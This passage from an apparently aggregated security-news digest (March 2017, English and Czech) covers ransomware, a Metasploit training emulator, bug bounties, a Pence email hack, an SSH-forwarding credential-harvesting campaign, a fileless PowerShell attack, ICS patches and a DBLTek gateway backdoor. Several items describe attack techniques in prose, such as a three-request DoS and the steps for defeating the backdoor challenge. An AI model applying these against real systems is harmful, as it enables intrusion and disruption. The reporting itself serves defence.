The software supplier for the infected application patched the flaw and issued a security patch within 8 hours.
Unfortunately, the number of cyber attacks on hospitals continues to increase and ransomware is among the most dangerous threats to this critical infrastructure.
In November 2016, a malware compromised the National Health Service (NHS) network, hundreds of scheduled operations, appointments, and diagnostic procedures have been canceled.
The hospitals hit by the malware-based attack are all located in the Lincolnshire, in England. In response to the incident, the IT staff shut down all the systems within its shared IT network aiming to “isolate and destroy” the malware.
Some patients, including major trauma patients, were diverted to the neighboring hospitals. The hospitals affected by the incident were the Diana Princess of Wales in Grimsby, Scunthorpe general and Goole and District.
Who will be the next?
Metasploit team released Metasploit Vulnerable Services Emulator
5.3.2017 securityaffairs Vulnerebility
Rapid7 released the Metasploit Vulnerable Services Emulator, a new tool that can be used by IT experts to emulate vulnerable services.
Which is the best way to protect a system? You need to think of the system in the attacker’s perspective, for this reason, Metasploit has now a new tool that can be used to emulate vulnerable service, the Metasploit Vulnerable Services Emulator. The tool is open source, it was designed to give users a vulnerable OS platform that could allow security experts to test the thousands of Metasploit modules available for its community.
“There’s one problem: it’s hard to use Metasploit without vulnerable services to play against.” wrote Jin Qian in a blog post. “We developed the Vulnerable Services Emulator to fill this gap. It is a framework that makes it easy to emulate the vulnerable services for penetration testing purposes”
In the past, Metasploit released two vulnerable OS images, Metasploitable2 and Metasploitable3, with this purpose. but their use was limited due to the small subset of the thousands of Metasploit modules available for users.
The Metasploit Vulnerable Services Emulator is available on GitHub, it already emulates more than 100 vulnerable services as explained by Qian.
“Right now, it emulates over 100 vulnerable services, covering things like compromising credentials, getting a shell from the victim, and more. After going through module exercises, users can learn details about security vulnerabilities and how to test them, and are encouraged to continue to learn and play with Metasploit’s capabilities,” said Qian.
The Metasploit Vulnerable Services Emulator works on Windows, Mac or Linux. It is very easy to install and use, as a prerequisite it requires the installation of a working Perl installation.
The developers who designed the tool used JSON to describe vulnerable services, a choice to make independent the platform from the specific programming language.
“We know developers have very different preferences on programming languages, so instead of implementing the vulnerable services using a particular language, the framework describes vulnerable service interactions in JSON.” continues the post. “It’s not a programming language per se but it has enough logic for service emulation. The following is the description for the vulnerable printer service.”
Security experts can use the Metasploit Vulnerable Services Emulator to test their Metasploit modules or to get training on Metasploit.
Vyděračský ransomware více cílí na Android, inspirují je úspěšné útoky na počítače
5.3.2017 Novinky/Bezpečnost Viry
Mobilní zařízení s operačním systémem Android jsou častějším terčem útoků vyděračského škodlivého kódu. Loni těchto útoků meziročně přibylo o 50 procent, zjistila společnost ESET.
Různé škodlivé kódy loni útočily na Android více než v roce 2015, nárůst počtu případů ransomware byl ale nejvýraznější.
„I když jsme celkově zaznamenali nárůst detekcí malwaru na Androidu přibližně o 20 procent, útoky ransomware na tuto platformu rostou mnohem rychleji. Nejvyšší nárůst zaznamenal ESET v první polovině roku 2016, rozhodně bychom si ale nedovolili říci, že tato hrozba v dohledné době pomine,“ říká technologický ředitel společnosti ESET Juraj Malcho.
Ransomware je typ škodlivého kódu, který různými způsoby zablokuje zařízení a za jeho odblokování žádá od oběti výkupné. Loni šlo o historicky nejvyšší počet pokusů o infikování zařízení s Androidem tímto způsobem. ESET, který má tato data k dispozici díky svojí technologii LiveGrid, svá zjištění prezentoval na veletrhu Mobile World Congress v Barceloně.
Je to globální hrozba, varuje expert
Autoři lockscreenů (škodlivý kód, který uzamkne displej mobilního zařízení) a crypto-ransomware (škodlivý kód, který zašifruje obsah zařízení) využili uplynulý rok k tomu, aby zkopírovali techniky šíření, které používají druhy malware útočící na počítače.
Vyvinuli ale také sofistikované metody, které se zaměřují na technologie specifické pro operační systém Android. Kyberzločinci se zároveň zaměřili na to, aby nevyčnívali tím, že škodlivý kód šifrují a nebo ho skrývají hlouběji do infikovaných aplikací.
V průběhu roku 2015 společnost ESET zaznamenala, že zájem tvůrců ransomware, které cílí na Android, se přesunul z východní Evropy do USA a zaměřuje se na uživatele mobilních telefonů. Nicméně v loňském roce se ukázalo, že útočníci stále více míří i na asijský trh. „Určitě můžeme konstatovat, že se z ransomware na Androidu stala plnohodnotná globální hrozba,“ dodává Juraj Malcho.
Jak bezpečné jsou virtualizační kontejnery?
5.3.2017 SecurityWorld Bezpečnost
Jak organizace začínají používat virtualizační kontejnery pro zlepšení dodávek a agility aplikací, zabezpečení této přicházející technologie logicky získává mnohem více pozornosti.
Dodavatelé kontejnerových řešení – Docker, Red Hat a další – se intenzivně snaží uklidnit a přesvědčit trh o bezpečnosti kontejnerů. V srpnu loňského roku představil Docker funkci Docker Content Trust jako součást vydání verze Docker 1.8.
Využívá šifrování k zabezpečení kódu a verzí softwaru běžících v softwarových infrastrukturách uživatelů Dockeru. Záměrem je chránit uživatele Dockeru před nebezpečnými zadními vrátky obsaženými v bitových kopiích sdílených aplikací a dalšími potenciálními bezpečnostními hrozbami.
Docker Content Trust se zaměřuje na integritu dodaného obsahu kontejnerů Docker. V konečném důsledku jde o kryptografické podepisování nasazovaných bitových kopií Dockeru, tedy o přístup využívaný také při vývoji linuxového jádra a mnoha vývojáři a OEM výrobci vestavěných systémů, aby se zajistilo, že může dojít ke spuštění jen podepsaných bitových kopií (například v kódu Samsung Knox na platformě Android).
To je však jen jeden aspekt bezpečnosti kontejnerů. Existuje také výzva, jak zajistit, že je kód tvořící celou bitovou kopii bez zranitelností. Pokud organizace neudržují sady softwaru a portfolio aplikací tak, aby neobsahovaly známé zneužitelné verze kódu open source, jsou taková opatření jen částečným řešením.
Bez hygieny open source totiž tyto nástroje zajistí jen to, že bitové kopie Dockeru obsahují přesně stejné bity, jaké tam původně vložili vývojáři, včetně všech zranitelností přítomných v open source komponentách.
Holističtější přístup
Je potřeba, aby k výběru technologií open source docházelo informovaným způsobem. Uživatelé i integrátoři open source kódu by měli být opatrní a měli by se starat o průběžnou údržbu kódu. Je nutné znát svůj kód, protože nelze spravovat něco, co nevidíte.
Přehled o kódu uvnitř kontejnerů je kritickým prvkem bezpečnosti kontejnerů, dokonce hned vedle bezpečnosti samotných kontejnerů. Neustále totiž dochází k objevování nových zranitelností, které ovlivňují starší verze komponent open source.
Z tohoto důvodu je informovanost o nepřítomnosti zranitelností v době úvodního sestavení a nasazení nutná, ale zdaleka nestačí.
Zabezpečení obsahu kontejnerů je srovnatelné s libovolnou jinou záležitostí zabezpečení sady softwaru. Trik ale spočívá v tom, kdy a jak získat viditelnost uvnitř kontejneru během vývoje a po nasazení.
Bezpečnostní riziko, které představuje kontejner, závisí na citlivosti dat dostupných přes něj a na místě jeho nasazení, například za firewallem nebo v místě dostupném z internetu.
Weby dostupné z internetu a cloudové aplikace jsou primárními terči zločinců a samozřejmě představují nejvyšší potenciální expozici. Veřejně dostupný útočný prostor z nich dělá cíl řady útoků včetně skriptování mezi weby (XSS), metody injektáže SQL (SQL injection) a útoku DoS (odepření služby).
Vzhledem k rozšířenosti prostředí open source a dalších komponent cloudových a webových aplikací přitom dochází k významnému přínosu open source hygieny pro řešení zranitelností těchto komponent.
Nutná hygiena open source
S nárůstem používání softwaru open source v celém podniku a se současnými ostře sledovanými zranitelnostmi vyvolávajícími alarmy se stala hygiena open source nezbytnou součástí efektivní strategie zabezpečení aplikací.
Stejně jako tělesná hygiena zahrnuje neutralizaci zdrojů infekce, také hygiena open source s sebou nese nutnost udržovat sady softwaru a portfolio aplikací bez známých zneužitelných verzí kódu open source. Je to pro kontejnery stejně důležité jako pro každý jiný prvek softwarových sad.
Zranitelnosti se ve všech typech softwaru nevyhnutelně objevují a open source není výjimkou. Detekce a sanace zranitelností je v open source, jako v případě vysoce závažných zranitelností typu Heartbleed a Freak, se stále více považuje za nezbytnou podmínku bezpečnosti a klíčovou součást silné strategie zabezpečení aplikací.
Pro mnoho organizací je dnes zabezpečení aplikací svázané více než dříve se zabezpečením kontejnerů. Dobrou zprávou ale je, že pro firmy vyvíjející komplexní bezpečnostní strategie open source jsou dnes k dispozici inovativní nástroje pro získání určitého náskoku.
Tyto nástroje dokážou katalogizovat veškerý kód open source v portfoliích softwaru z celých platforem, jako jsou Linux, Android a Hadoop, jednotlivých komponent kódu a dále detailně až na úroveň částí kódu vložených do interně vyvíjeného kódu aplikací.
Tyto skenovací nástroje použité na vyžádání nebo integrované do pracovních postupů vývoje softwaru poskytují firmám důležité informace, na základě kterých je možné reagovat, aniž dojde ke zpomalení vývoje nebo prodloužení doby uvedení na trh.
Je velmi důležité vyvinout robustní postupy pro zjištění následujících skutečností:
Jaký přesně open source software je součástí aplikace nebo jejího nasazení?
Kde se tento open source software nachází ve stromech sestavení a architekturách systémů?
Má kód nějaké známé zranitelnosti zabezpečení?
Vytvoření přesného profilu rizik open source.
Zpomalí se přijímání kontejnerů?
Velké podniky dnes kontejnery implementují pro jejich prokázané výhody: vylepšenou škálovatelnost aplikací, méně chyb nasazení, kratší dobu uvedení na trh a zjednodušenou správu aplikací.
Stejně jako organizace během let změnily svůj pohled na open source a už ho nevnímají jako kuriozitu, ale jako podnikatelskou nezbytnost, vypadá to, že kontejnery dosáhly podobného bodu zvratu.
Rockstar Games Launches Public Bug Bounty Program
4.3.2017 securityweek Vulnerebility
Rockstar Games this week launched a public bug bounty program through HackerOne, after running it in private mode for more than nine months.
On the program’s page, the company reveals that the minimum bounty for successful vulnerability submissions is $150, but that researchers can get higher rewards, depending on the severity and complexity of the identified potential vulnerability. However, the company notes that higher bounties may be paid out at its own discretion.
For the time being, researchers are required to look for vulnerabilities only in a specific set of domains operated by the company.
“No authorization is given to test any other web applications, video game titles or mobile applications. No bounties will be given for any disclosures relating to any applications outside the scope of this program,” the company specifies.
At the same time, researchers are encouraged to hunt for bugs in support.rockstargames.com, because the portal is run on top of the Zendesk platform, and because Zendesk also participates in the HackerOne bounty program.
Interested researchers should head to the bug bounty program’s page and go through all of the recommendations and guidelines that the company published there, as submissions that don’t follow those requirements may not qualify for a bounty.
Valid submissions, Rockstar Games says, should include details on the type of issue being reported, the kind of attack, whether it fits a CWE (Common Weakness Enumeration) number, details on the steps necessary to reproduce the issue (issues that can’t be reliably reproduced can’t be fixed, the company notes), info on potential impact of the bug, and details on how a malicious user could potentially benefit from the issue.
“The privacy, security and experience of our users are of the utmost importance. Under no circumstances may any testing target or negatively affect our users. You must use only accounts you own and/or created specifically for testing purposes,” the company also notes.
To ensure their submissions qualify for a bounty, the researchers should be the first to submit a vulnerability and avoid publicly disclosing or discussing the vulnerability before or after submitting it. The company also published a list of bugs that are excluded from the program, yet it didn’t say what type of flaws are accepted, most probably because all other types of security issues are.
Rockstar’s bug bounty program has been running in private mode for the past nine months, which allowed the company to resolve “readily identifiable types of vulnerabilities found across their network,” HackerOne says. With over 150 vulnerabilities identified and closed and more than $85,000 in bounties paid, the program is considered a “huge success.”
Scientists Store an Operating System, a Movie and a Computer Virus on DNA
4.3.2017 thehackernews Virus
Do you know — 1 Gram of DNA Can Store 1,000,000,000 Terabyte of Data for 1000+ Years.
Just last year, Microsoft purchased 10 Million strands of synthetic DNA from San Francisco DNA synthesis startup called Twist Bioscience and collaborated with researchers from the University of Washington to focus on using DNA as a data storage medium.
However, in the latest experiments, a pair of researchers from Columbia University and the New York Genome Center (NYGC) have come up with a new technique to store massive amounts of data on DNA, and the results are marvelous.
The duo successfully stored 214 petabytes of data per gram of DNA, encoding a total number of six files, which include:
A full computer operating system
An 1895 French movie "Arrival of a Train at La Ciotat"
A $50 Amazon gift card
A computer virus
A Pioneer plaque
A 1948 study by information theorist Claude Shannon
The new research, which comes courtesy of Yaniv Erlich and Dina Zielinski, has been published in the journal Science.
But How Did the Researchers Store Digital Data on DNA?
Calling their process a "DNA Fountain," the researchers first compressed all the data into a single master archive and split it into short strings of binary digits, made up of ones and zeros.
Next, the duo used an "erasure-correcting algorithm called fountain codes" to randomly packaged the strings into droplets. Each droplet contains a barcode in the sequence that helped the researchers reassembling the file.
The researchers then "mapped the ones and zeros in each droplet to the four nucleotide bases in DNA: A, G, C and T," and ended up with a digital list of 72,000 DNA strands that contained the encoded data.
This code was then sent in a text file to Twist Biosciences, the same DNA synthesis startup from which Microsoft purchased 10 Million strands of synthetic DNA last year, that then turned that digital information into biological DNA.
"Two weeks later, they received a vial holding a speck of DNA molecules. To retrieve their files, they used modern sequencing technology to read the DNA strands, followed by software to translate the genetic code back into binary. They recovered their files with zero errors," the journal reads.
'Highest-Density Data-Storage Device Ever Created'
The researchers believe that DNA is the perfect storage medium – as it is ultra-compact and can last hundreds of thousands of years if kept cool and dry – and suggests this is the "highest-density data-storage device ever created."
Since the digital universe is large and by 2020 containing nearly as many digital bits as there are stars in the universe, the data will reach 44 zettabytes or 44 trillion gigabytes.
So, DNA data storage could help big organizations store an enormous amount of information in a way that one can still be able to read it in a hundred years.
However, cost is still an issue. The researchers spent around $7,000 to synthesize the 2MB of data and another $2,000 to read that data.
However, with the time this will change, so do not expect this technique to go mainstream anytime soon.
For more details on the technology, you can check this link out and the video given above.
The US Vice President Mike Pence’s personal AOL account was hacked
4.3.2017 securityaffairs Hacking
The US Vice President Mike Pence’s personal AOL account was hacked, once again politics were breached due to wrong security posture.
Pence has been harshly criticized after the discovery that he used his personal AOL account for Government issues.
In 2016 attacker who compromised the Pence’s account sent out emails to his contacts saying he had been mugged in the Philippwrongand needed money, a classic scam scheme.
The emails sent from the Pence’s personal AOL account were obtained by the Indianapolis Star under a Freedom of Information Act.
“Vice President Mike Pence reportedly used a private email account to conduct public business, including homeland security matters, while he was governor of Indiana. Records of the emails were obtained by IndyStar through a public records request.” reads the article published by the Indystar.
“Emails released to IndyStar in response to a public records request show Pence communicated via his personal AOL account with top advisers on topics ranging from security gates at the governor’s residence to the state’s response to terror attacks across the globe. In one email, “
Pence's personal AOL account
Republican U.S. presidential candidate Donald Trump (R) points to Indiana Governor Mike Pence (L) before addressing the crowd during a campaign stop at the Grand Park Events Center in Westfield, Indiana, July 12, 2016. REUTERS/John Sommers II – RTSHNAG
The Indiana Gov. Eric Holcomb’s office provided the media outlet a 29 pages document containing Pence’s email messages.
The emails include sensitive communications between Pence when was serving as the Indiana governor and members of his staff. The messages concern terrorist arrests, terror attacks in Canada, and much more.
“Similar to previous governors, during his time as Governor of Indiana, Mike Pence maintained a state email account and a personal email account.” replied a spokesman for Pence working at the office in Washington.”As Governor, Mr. Pence fully complied with Indiana law regarding email use and retention. Government emails involving his state and personal accounts are being archived by the state consistent with Indiana law, and are being managed according to Indiana’s Access to Public Records Act.”
The embarrassing aspect of the story is that during the US Presidential election campaign Pence attacked Hillary Clinton for misusing a private email server for work while Secretary of State.
Follow
Mike Pence ✔ @mike_pence
.@realDonaldTrump and I commend the FBI for reopening an investigation into Clinton's personal email server because no one is above the law.
1:46 AM - 29 Oct 2016 · Smithfield, NC
12,686 12,686 Retweets 20,253 20,253 likes
Fortunately for US Vice President, Pence’s account did not handle classified material as a governor and US law allowed him this promiscuous use of his personal email.
Anyway, some of the emails in the Pence’s account weren’t disclosed because “the state considers them confidential and too sensitive to release to the public.”
Exclusive: A criminal group using SSH TCP direct forward attack is also targeting Italian infrastructure
4.3.2017 securityaffairs Attack
Exclusive: MalwareMustDie for Security Affairs released the list of the sites under attack. A criminal gang is using SSH TCP direct forward attack technique.
MalwareMustDie is back and has published his the first post of 2017. The popular malware researcher has uncovered a cyber crime gang that is harvesting credentials and credit card numbers from major websites all around the world.
MMD has published a detailed analysis of the harvesting technique used by cyber criminals.
“A legitimate user who is having authentication privilege of an existing SSH connection can forward TCP protocol in proxy-ing mechanism. It’s an almost common practice nowadays in the nutshell, specially to the services that is meant to be view from a local networking area.” wrote MMD.
“This threat’s definition is The abuse of SSH TCP forward legitimate usage, by performing automatic or manual attack to weak SSH accounts of remote devices (either servers and IoT), with brute-forcing account’s credential or passwords, to perform malicious set of TCP attacks via TCP Direct Forward technique on SSH Forwarding functionality utilizing this “force-accessed” SSH connection to targeted remote services.”
Following the operations of the criminal organization, MalwareMustDie has identified a new model of attack that has been adopted all around the world.
Figure 1: The scheme adopted by a new threat
But let’s give a look at the overall process and the modus operandi of the attackers.
“The attacker is grabbing credentials from the hack-able targets from their infrastructure” continues MalwareMustDie blog: “They manually perform the attack or daemonized the SSH connectivity to be TCP forwarded through some layers of hack-able SSH accounts to perform the attack. The infrastructure of compromised SSH services and IoT devices are used as front-end cushion for the attack. They aimed for credential launched through several TCP attacks (HTTP/HTTPS or SMTP).”
Attackers are able to launch various forms of attacks mostly aiming HTTP (protocol) with and without SSL.
The forms of attacks are:
Sending malformed HTTP requests to a targeted web server to exploit the service.
Sending invalid HTTP method requests for mod-ssl vulnerabilities with the same purpose as above.
Sending HTTP requests to force (brute)authentication in a legitimate sites for user(s) and password(s).
Sending HTTP requests to compromised sites to allegedly confirm suspicious activities.sites to allegedly confirm suspicious activities.
Sending SMTP requests to several email servers (Hereforth is called as “MTA”).
The analysis published by MalwareMustDie includes several PoC codes, the researcher also shared reversed code and traffic analysis, along with mitigation measures.
MMD included screenshots of most seen abuses against major websites such as PayPal, LinkedIn, Facebook, Gmail, Royal Bank, AT&T, Playstation Store, Playstation Network, eBay, Ubisoft, Sony Entertainment Network, and many others,
According to MMD, the hackers harvested a huge quantity of email from major online email services, including Gmail, Yahoo, AOL, Microsoft (Live Mail & Hotmail), Mail.ru, Yandex, etc.
When the attackers steal the credentials from a website then they use them in brute force attacks on other services.
“we have a recycle-like process for ultimate credential harvesting directed by hackers.” reads MMD.
The hackers launched both automated and manual attacks with different characteristics in the way of making connections and performing attack sessions.
“Some typical characteristic in its logged activities have suggested a human’s direct interactive during a session of attacks, supporting facts of the establishment for connection used to conduct
TCP forwarding
that was manually set.” wrote MMD.
Exclusive – Italian websites under attack
MMD, with the support of the popular cyber security expert Odisseus allowed me to prepare and share a list of the Italian websites targeted by the criminal gang.
We publish on exclusive the list of targeted Italian websites, the overall number of targets is 140, that includes many mail servers.
The complete and detailed list will be shared with Italian authorities to allow further investigations.
Among the victims there are:
Alma Mater Studiorum Universita di Bologna
Siae
Ansaldo S.p.A. WAN
Telecom Italia S.p.A.
Universita degli Studi di Milano
FAO Food and Agriculture Organization of the United Nations
Bankadati Servizi Informatici Soc. Cons. p. A.
Intesa Sanpaolo Group Services S.c.p.A.
Cedecra Informatica Bancaria SRL
DADAnet Italia
BANCA CARIGE S.p.A.
Italiaonline S.p.A.
Tiscali SpA
Fincantieri Cantieri Navali Italiani
Server Plan S.r.l.
Banca Popolare di Milano
Telecom Italia S.p.A.
FastWeb’s Main Location
It is very important that the Italian CERTs start working together to fight against this kind of threat: there is no time to waste!
The report shared by MMD is full of interesting data, including geographical distribution of the victims (mostly in the US) and the overall list of targeted IP addresses, including the Italian ones.
Special Thanks to Odisseus who supported me in the analysis of the events.
Update March 4, 2016
Security Affairs and Odisseus alerted the “Team Digitale” of the Italian Government that confirmed it is already working on the case.
Google Increases Bug Bounty Payouts by 50% and Microsoft Just Doubles It!
4.3.2017 thehackernews Security
Well, there's some good news for hackers and bug bounty hunters!
Both tech giants Google and Microsoft have raised the value of the payouts they offer security researchers, white hat hackers and bug hunters who find high severity flaws in their products.
While Microsoft has just doubled its top reward from $15,000 to $30,000, Google has raised its high reward from $20,000 to $31,337, which is a 50 percent rise plus a bonus $1,337 or 'leet' award.
In past few years, every major company, from Apple to P*rnHub and Netgear, had started Bug Bounty Programs to encourage hackers and security researchers to find and responsibly report bugs in their services and get rewarded.
But since more and more bug hunters participating in bug bounty programs at every big tech company, common and easy-to-spot bugs are hardly left now, and if any, they hardly make any severe impact.
Sophisticated and remotely exploitable vulnerabilities are a thing now, which takes more time and effort than ever to discover.
So, it was needed to encourage researchers in helping companies find high-severity vulnerabilities that have become harder to identify.
Until now, Google offered $20,000 for remote code execution (RCE) flaws and $10,000 for an unrestricted file system or database access bugs. But these rewards have now been increased to $31,337 and $13,337, respectively.
For earning the top notch reward of $31,337 from the tech giant, you need to find command injections, sandbox escapes and deserialization flaws in highly sensitive apps, such as Google Search, Chrome Web Store, Accounts, Wallet, Inbox, Code Hosting, Google Play, App Engine, and Chromium Bug Tracker.
Types of vulnerabilities in the unrestricted file system or database access category that can earn you up to $13,337 if they affect highly sensitive services include unsandboxed XML eXternal Entity (XXE) and SQL injection bugs.
Since the launch of its bug bounty program in 2010, Google has paid out over $9 Million, including $3 Million awarded last year.
Microsoft has also increased its bug bounty payouts from $20,000 to $30,000 for vulnerabilities including cross-site scripting (XSS), cross-site request forgery (CSRF), unauthorized cross-tenant data tampering or access (for multi-tenant services), insecure direct object references injection, server-side code execution, and privilege escalation bugs, in its Outlook and Office services.
Both the tech giants are trying their best to eliminate any lucrative vulnerability or backdoor into their software and products to avoid any hacking attempts and make them more secure.
Hackers will get the payout reward after submitting the vulnerabilities along with a valid working proof-of-concept.
So, what are you waiting for? Go and Grab them all!
High Severity Flaws Patched by Siemens, Schneider Electric
4.3.2017 securityweek ICS
ICS-CERT informed organizations earlier this week that Siemens and Schneider Electric have each patched high severity vulnerabilities in their products.
Siemens has addressed a man-in-the-middle (MitM) flaw in two SINUMERIK automation products that are used worldwide in the energy, healthcare and transportation sectors.
The SINUMERIK Integrate integration tool and the SINUMERIK Operate human-machine interface (HMI) are affected by a remotely exploitable vulnerability that can allow an MitM attacker to capture and modify data in TLS sessions.
The vulnerability, tracked as CVE-2017-2685, only affects clients when HTTPS is used, Siemens said in its advisory. The vendor has released patches for each of the affected product versions.
Schneider Electric has addressed a denial-of-service (DoS) vulnerability in Conext Combox, a monitoring and communications device for installers and operators of Conext solar systems. The product is used in the energy sector worldwide.
The flaw, reported to the energy giant by Arik Kublanov and Mark Liapustin of Nation-E, can be easily exploited by a remote attacker. Sending three HTTP GET requests in quick succession with an incorrect username and password causes the device to reboot itself.
The security hole, identified as CVE-2017-6019, affects all versions of the firmware for Conext ComBox 865-1058 devices. The issue has been addressed with the release of firmware version 3.03 BN 830.
These are not the only vulnerabilities fixed recently by Schneider Electric and Siemens. The former has patched a high severity credential management weakness in its StruxureWare Data Center Expert software suite, while the latter resolved cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs in its RUGGEDCOM network management system (NMS).
Researchers Uncover Sophisticated, Fileless Attack
4.3.2017 securityweek Virus
Researchers Discover New Non-Malware Obfuscated Targeted Attack
A simple tweet ultimately unraveled a complex, fileless attack. The tweet highlighted encoded text in a PowerShell script that said 'SourceFireSux'. This ultimately led researchers to discover and analyze an attack comprising a malicious Word document and a PowerShell RAT communicating with its C&C servers via unblocked DNS requests. The attack is completely fileless -- non-malware designed to be invisible to standard anti-malware defenses.
SourceFire was acquired by Cisco in 2013 for $2.7 billion. The 'SourceFireSux' reference sparked the interest of researchers at Talos, Cisco's threat intelligence arm, who unsurprisingly wanted to know more. Talos was formed from SourceFire's vulnerability research team together with Cisco's own researchers.
A Talos search for the encoded string uncovered a single sample that had been uploaded to the public malware analysis sandbox, Hybrid Analysis.
A search for the decoded string located a single Pastebin entry uploaded by @JohnLaTwC (Twitter's @JohnLaTwC is John Lambert, general manager, Microsoft Threat Intelligence Center) on Feb. 16, eight days before the tweet. The associated hash led to a malicious Word document that matched the details found in Hybrid Analysis.
Now knowing what they were looking for, Talos was able to locate additional samples and reconstruct and analyze the attack. They found a complex example of the growing tendency for attackers to manipulate existing and trusted Windows facilities rather than install malware that can be detected.
The attack is delivered by a phishing email as a weaponized Word document. The recipient is persuaded to open the document by the assertion, "This document has been secured by McAfee. To view this Protected Document, click Enable Content." Doing so enables a VBA macro which opens PowerShell and loads and unpacks the malicious code without requiring any file to be written to disk.
The script checks for admin status and PowerShell version. Depending on whether it has Administrator or User access, it sets registry entries (HKLM for Admin or HKCU for User) to achieve persistence. If PowerShell is 3.0 or later, the payload is written to an Alternate Data Stream. If it is an earlier version, the payload is encoded and written to the location defined in the registry entries.
The script also contains arrays of domains from which it periodically selects a C2 domain to query. Querying these obtains TXT records containing further PowerShell commands.
PowerShell has effectively become a backdoor that is never written to disk, and the actual process is complex.
"It takes the code received in the DNS query response and defines a string variable which contains the code," explained Talos researchers Edmund Brumaghin and Colin Grady. "It then calls the decode function from the third stage and passes the decoded string into IEX to further extend the Powershell environment. Once this is complete, it then calls a function in the newly extended environment to execute the fourth stage code along with specific parameters. These parameters include the fourth stage C2 domain to use as well as the program to execute which in this case is the Windows Command Line Processor (cmd.exe). This is interesting because it results in the fourth stage payload never actually being written to the filesystem of the infected system."
This is clearly an attack designed to compromise a specific target. Everything discovered by Talos indicates that the discovered samples are recent.
"The domains associated with the Powershell sample that we analyzed from Hybrid Analysis were initially registered on 2017-02-18," note the researchers. "According to data available within Umbrella [a product acquired by Cisco when it purchased OpenDNS], the majority of DNS activity related to the domains used by the powershell sample appears to have occurred between 2017-02-22 and 2017-02-25. There was less activity associated with the other identified sample, with most occurring on 2017-02-11."
Talos was unable to get the C2 infrastructure to issue any commands. The implication is that it is a targeted attack using different C2 domains for individual targets. It would be simple to adjust the lure in the initial phishing email and the hard coded C2 domains for each individual target -- so this could be a brand new attack or an attack only just discovered.
It is, say the researchers, "a great example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting. It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure."
Vulnerable Services Emulator Released for Metasploit
4.3.2017 securityweek Vulnerebility
A new tool that can emulate vulnerable services and help researchers get more from the Metasploit penetration testing platform is now available in open source.
Designed to help security researchers understand security from the attacker’s perspective, Metasploit’s main issue was that it was rather difficult to use without vulnerable services at hand. Vulnerable OS images (Metasploitable2 and Metasploitable3) have previously been available, but they weren’t enough, as only a “small subset of the thousands of Metasploit modules available for users” was included in them.
Available on GitHub, the Vulnerable Services Emulator, however, comes to solve that problem, Jin Qian notes in a blog post. It has been designed as a framework to allow researchers easily emulate the vulnerable services for penetration testing purposes.
“Right now, it emulates over 100 vulnerable services, covering things like compromising credentials, getting a shell from the victim, and more. After going through module exercises, users can learn details about security vulnerabilities and how to test them, and are encouraged to continue to learn and play with Metasploit’s capabilities,” Qian explains.
The tool, he says, is very easy to install and use, as all that it requires is a working Perl installation for Windows, Mac or Linux. Moreover, the emulator was designed to be language independent, with the service emulation in JSON format. Thus, anyone can quickly add, remove, or edit a service in JSON.
One thing that users should keep in mind when running the emulator, however, is that “the commands typed on the shell session spawned are actually executed on the target.” Anyone using the emulator should run it in a safe environment to avoid any issues.
The Vulnerable Services Emulator was meant to help IT professionals and engineers easily test Metasploit modules, as well as to get training on Metasploit. At the moment, the tool includes support for over 100 emulated vulnerable services, but work is being done to add “as many of the 1000+ modules in Metasploit as possible.”
“At the core of the project, we implemented a framework (an interpreter) to execute the JSON based service description file. The current implementation is in Perl, but you can implement the framework in other programming languages of your choice,” Qian notes. Additional technical details on the tool are available on the project’s page on GitHub.
Google Offers $31,337 for RCE Vulnerabilities
3.3.2017 securityweek Vulnerebility
Google informed bug bounty hunters on Thursday that it has made some changes to its Vulnerability Rewards Program (VRP), including offering more money for certain types of flaws.
Until now, the tech giant had offered $20,000 for remote code execution (RCE) vulnerabilities and $10,000 for unrestricted file system or database access issues. The rewards have now increased to $31,337 and $13,337, respectively.
Researchers can earn $31,337 if they find command injections, sandbox escapes and deserialization bugs in highly sensitive applications, such as Google Search, Accounts, Wallet, Inbox, Code Hosting, Chrome Web Store, App Engine, Google Play, and Chromium Bug Tracker. If the flaws affect non-integrated acquisitions or apps that have a lower priority, the maximum reward is $5,000.
The unrestricted file system or database access category includes unsandboxed XXE and SQL injection vulnerabilities. These types of flaws can earn bounty hunters up to $13,337 if they affect highly sensitive services.
Google also announced that rewards attributed to vulnerability reports from its internal web security scanner will be donated; $8,000 have been donated this year to rescue.org.
The company reported in late January that it has paid out more than $9 million since the launch of its bug bounty program in 2010, including $3 million awarded last year. More than $400,000 of the total amount paid out in 2016 represented rewards that exceeded $20,000, including a single reward of $100,000.
A survey conducted by Google among its top researchers showed that, in 2016, 57 percent of them looked for vulnerabilities a few times a month, nearly 24 percent looked rarely or never, and 19 percent put their skills to work almost every day. Half of the respondents said they sometimes found flaws, while 16.7 percent said they almost always found flaws. One-third of respondents said they very rarely or never discovered bugs.
The highest numbers of researchers paid in 2016 were based in China, the United States and India.
Highest paid researchers
Backdoor Found in DBLTek GSM Gateways
3.3.2017 securityweek Mobil
Researchers at Trustwave have identified a backdoor in GSM gateways manufactured by Hong Kong-based voice over IP (VoIP) solutions provider DBL Technology.
The company’s DBLTek GoIP devices are designed to bridge GSM and IP networks. DBL Technology has been around for more than 10 years and its products are available worldwide.
In addition to a management web interface, GoIP devices have a telnet-accessible command-line interface. This telnet interface can be accessed using one of two accounts (“ctlcmd” and “limitsh”) protected by a user-set password.
While these accounts can be used to obtain limited information about the device via telnet, experts also discovered an undocumented account, named “dbladm,” which provides root-level shell access to the gateway. The problem is that this account is not protected by a password, but a challenge-response authentication mechanism that can be easily defeated.
When a user attempts to log in to this account, they are presented with a “challenge” number, which they must solve to obtain the password. Trustwave reverse engineered the authentication scheme and determined that there are only five steps to solving it. This includes adding a number to the initial challenge, shifting bits, and generating an MD5 hash.
“It is highly likely that this authentication scheme is the result of a testing mechanism built into the '/sbin/login' binary to permit DblTek engineers to login to devices without having to authenticate for devices running on the local network,” Trustwave researchers said.
The backdoor account is present on GoIP devices with 1, 4, 8, 16 and 32 SIM card ports. Experts believe the vulnerability could also affect other products developed by the company.
Trustwave made the first attempt to contact the vendor in October 2016, but it only received a response in December. A firmware update was released on December 21, but experts determined that instead of properly addressing the issue, DBL simply made the challenge more complex.
“It seems DblTek engineers did not understand that the issue is the presence of a flawed challenge response mechanism and not the difficulty of reverse engineering it,” experts said.
SecurityWeek has reached out to DBL Technology for comment and will update this article if the company responds.
New Financial Regulation Forces Cyber Security into the Board Room
3.3.2017 securityweek Cyber
